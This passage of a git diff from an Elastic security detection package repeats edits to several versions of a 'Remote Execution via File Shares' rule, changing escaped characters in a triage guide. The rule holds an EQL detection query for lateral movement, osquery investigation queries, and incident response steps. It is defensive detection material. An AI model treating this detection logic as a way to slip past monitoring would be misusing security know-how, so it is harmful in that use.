the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json index ebb7016ce02..3d1bf77e474 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json index 6acf6e62b8e..316dce49ed8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json index 6cf3b02eb30..f2eca12afae 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json index 5bac2cb0a57..e481567478d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, 